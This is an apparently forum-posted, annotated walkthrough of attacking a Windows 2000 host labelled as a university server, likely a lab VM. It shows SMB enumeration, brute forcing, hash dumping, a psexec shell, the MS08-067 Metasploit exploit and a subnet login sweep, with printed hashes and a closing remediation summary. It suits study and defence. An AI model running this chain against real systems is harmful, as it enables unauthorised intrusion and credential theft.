广西师范网站 http://202.103.242.241/  (target as labelled in the original post: a Guangxi Normal University web server)
// Note: the scans below report a VirtualBox OUI (08:00:27, "Cadmus Computer Systems") and sub-millisecond latency, so the host is almost certainly a local lab VM configured with this address rather than the live site.
root@bt:~# nmap -sS -sV 202.103.242.241
// -sS (SYN scan) needs root; -sV probes each open port for a service banner.

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask       Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc        Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
// What this tells us: a Windows 2000 host with SMB (139/445), RPC endpoint mapper (135), MSDTC (3372) and RDP (3389) exposed. Port 80 is among the 993 closed ports, so despite the "web site" label no HTTP service is reachable on this host — the rest of the walkthrough is purely an SMB/RPC attack path.
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   //列出扫描脚本 (list the SMB-related NSE scripts; `nmap --script-help 'smb-*'` shows what each one does and which need credentials)
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
//此乃使用脚本扫描远程机器所存在的账户名 (use the NSE script to enumerate the accounts that exist on the remote host)

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   //扫描结果 (result)

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
// No credentials were supplied, so this enumeration ran over an anonymous (null) SMB session. That only works because the host permits anonymous access to IPC$ (see the smb-enum-shares result below); on a hardened host this step returns nothing and you would need valid credentials via --script-args smbuser=...,smbpass=... .
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
//查看共享 (list the shares)

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
// ADMIN$ and C$ are correctly closed to anonymous users, but IPC$ allowing anonymous READ means null sessions are accepted (on Windows 2000 this is the RestrictAnonymous=0 default). That is the precondition that let the unauthenticated user enumeration above succeed and it also exposes the user list to brute forcing; the fix is to restrict anonymous access and not to expose 139/445 to untrusted networks at all.
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
//获取用户密码 (guess account passwords; with no userdb/passdb the script uses nmap's built-in username and password lists)

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
// This is the real finding: the built-in Administrator account has an empty password, and `test` uses 123456. With a blank local Administrator password every later step (hash dump, psexec, the "pass-the-hash" sweep, even the MS08-067 exploit) is already possible with plain authenticated access — the exploit adds nothing except noise. Operational caveat: smb-brute makes many logon attempts per account; against a host or domain with an account-lockout policy it can lock accounts out and it leaves failed-logon events in the Security log, so use it only where the engagement scope allows.
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   //抓hash (fetch pwdump6 for dumping password hashes; the URL was truncated by the forum in the original post — the archive name is pwdump6-1.7.2-exe-only.tar.bz2)
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
// Supply-chain caveat: this pulls a Windows binary over plain HTTP from a third-party host and an experimental script straight out of an svn dev tree, and nothing is verified (no checksum, no signature) before the binary is pushed onto a target and executed with admin rights. Verify what you download before you run it on a client's machine.
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
|   Administrator:500  => NO PASSWORD*********************:NO PASSWORD*********************
|   Guest:501          => NO PASSWORD*********************:NO PASSWORD*********************
|   test:1002          => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_  TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
// Reading the dump: the format is user:RID => LM-hash:NTLM-hash. "NO PASSWORD" confirms the blank passwords found by smb-brute. The dump succeeding as `test` implies that account has local administrative rights (the script has to upload and run a binary on the target). The LM hashes are present, i.e. LM hash storage was not disabled; for `test` the second LM half is AAD3B435B51404EE, the hash of an empty 7-byte block, which by itself tells an attacker the password is at most 7 characters.
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   //获取一个cmdshell (get an interactive cmd shell on the target; the command was split across two lines in the original post)

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

        Connection-specific DNS Suffix . :
        IP Address. . . . . . . . . . . . : 202.103.242.241
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 202.103.1.1
// psexec works the same way as smb-pwdump: it copies a service binary to ADMIN$ and starts it, so again it depends on `test` being a local administrator and it is logged as a new service installation. Also note the printed config: a /24 mask with a default gateway (202.103.1.1) outside the 202.103.242.0/24 subnet cannot route off-link as shown, another sign that the addressing is a lab artifact rather than the real server.
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   //远程登录sa执行命令 (log in remotely as sa and run an OS command through xp_cmdshell)
// Caveat: this step is asserted rather than demonstrated. Nothing earlier in the transcript established an `sa` password (it simply reuses `test`'s 123456), no output is shown, and port 1433 was not among the open ports in the nmap scans (it falls within the 993 closed ports), so SQL Server is either not running or listening elsewhere. If it did work, xp_cmdshell runs commands as the SQL Server service account, which on Windows 2000 installs was frequently LocalSystem.
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   //检测目标机器漏洞 (check the target for known SMB vulnerabilities)

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
// MS08-067 is the Server service (netapi32 path-canonicalisation) flaw patched in October 2008; a Windows 2000 host still reporting VULNERABLE in 2012 has not been patched for years. This check actively sends the crafted RPC request rather than inferring from a version string, so treat it as an intrusive test and confirm it is in scope before running it against production systems.
root@bt:~# msfconsole   //在msf上利用ms08-067漏洞对目标机器进行溢出 (exploit MS08-067 against the target from Metasploit)

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

meterpreter >
Background session 2? [y/N] (ctrl+z)
msf exploit(ms08_067_netapi) > sessions -l
// Notes: no TARGET is set, so the module relies on its automatic target detection; a wrong target selection for this exploit can crash the Server service instead of giving a shell. A bind_tcp payload opens a listener on the victim and requires inbound access to that port — fine in this lab, but a reverse payload is the usual choice across firewalls. And as already shown by smb-brute, the host was fully compromised with a blank Administrator password before any exploit was needed.
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator
root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
//利用用户名跟获取的hash尝试对整段内网进行登录 (try the harvested usernames and hash against the whole internal /24 — the pass-the-hash idea)

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful
// Caveats on this "pass-the-hash" sweep: (1) password.txt holds only the LM half of `test`'s hash; nmap's SMB library accepts a hash in place of a password when it is given as LM:NTLM or a full 32-hex value, but the only success printed is administrator with a blank password — the hash replay is never actually shown to work here. (2) The one host found, 192.168.1.105, reports the same MAC address as 202.103.242.241, so this looks like the same VM reached over a second interface rather than a new internal host. (3) Sweeping a whole /24 with smb-brute has the same lockout and logging consequences as the single-host run above.
攻击成功，一个简单的msf+nmap攻击 (attack successful — a simple nmap + msf chain)

// Summary for the defender: the chain worked because of (a) a blank password on the built-in Administrator account and a trivial, reused password (123456) on `test`; (b) null sessions permitted on IPC$, which exposed the user list without credentials; (c) SMB/RPC/RDP reachable from the attacker's network; (d) a Windows 2000 host unpatched for MS08-067; and (e) LM hashes still being stored. Any one of the first two is sufficient on its own; the exploit was never required. Remediation is the standard set: enforce non-blank, non-trivial passwords with lockout, set RestrictAnonymous, firewall 135/139/445/3389 from untrusted networks, patch (or retire the unsupported OS), and disable LM hash storage.